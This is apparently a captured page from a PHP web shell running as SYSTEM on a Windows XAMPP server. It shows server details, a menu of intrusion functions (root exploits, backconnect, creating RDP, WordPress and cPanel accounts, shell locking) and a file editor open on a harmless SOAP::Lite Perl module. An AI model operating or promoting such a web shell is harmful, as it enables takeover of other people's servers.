Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
SOAP /
Transport /
[ HOME SHELL ]
Name
Size
Permission
Action
HTTP.pm
28.68
KB
-rw-rw-rw-
IO.pm
1.66
KB
-rw-rw-rw-
LOCAL.pm
1.59
KB
-rw-rw-rw-
LOOPBACK.pm
1.73
KB
-rw-rw-rw-
MAILTO.pm
2.55
KB
-rw-rw-rw-
POP3.pm
3.51
KB
-rw-rw-rw-
TCP.pm
9.48
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : LOOPBACK.pm
# ====================================================================== # # Copyright (C) 2007 Martin Kutter. # Part of SOAP-Lite, Copyright (C) 2000-2001 Paul Kulchenko # (paulclinger@yahoo.com) # You may distribute/modify this file under the same terms as perl itself. # # $ID: $ # # ====================================================================== package SOAP::Transport::LOOPBACK; use strict; package SOAP::Transport::LOOPBACK::Client; use strict; our $VERSION = '1.27'; # VERSION use vars qw(@ISA); use SOAP::Lite; @ISA = qw(SOAP::Client); sub new { return $_[0] if ref $_[0]; return bless {}, $_[0]; } sub send_receive { my($self, %parameters) = @_; $self->code(200); $self->message('OK'); $self->is_success(1); $self->status('200 OK'); return $parameters{envelope}; } 1; __END__ =pod =head1 NAME SOAP::Transport::LOOPBACK - Test loopback transport backend (Client only) =head1 DESCRIPTION SOAP::Transport::LOOPBACK is a test transport backend for SOAP::Lite. It just returns the XML request as response, thus allowing to test the complete application stack of client applications from the front end down to the transport layer without actually sending data over the wire. Using this transport backend is triggered by setting a loopback:// URL. Sending requests through this transport backend alway succeeds with the following states: status: 200 OK code: 200 message: OK =head1 COPYRIGHT Copyright (C) 2007 Martin Kutter. All rights reserved. This file is part of SOAP-Lite, Copyright (C) 2000-2001 Paul Kulchenko. This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 AUTHOR Martin Kutter E<lt>martin.kutter fen-net.deE<gt> =cut
Close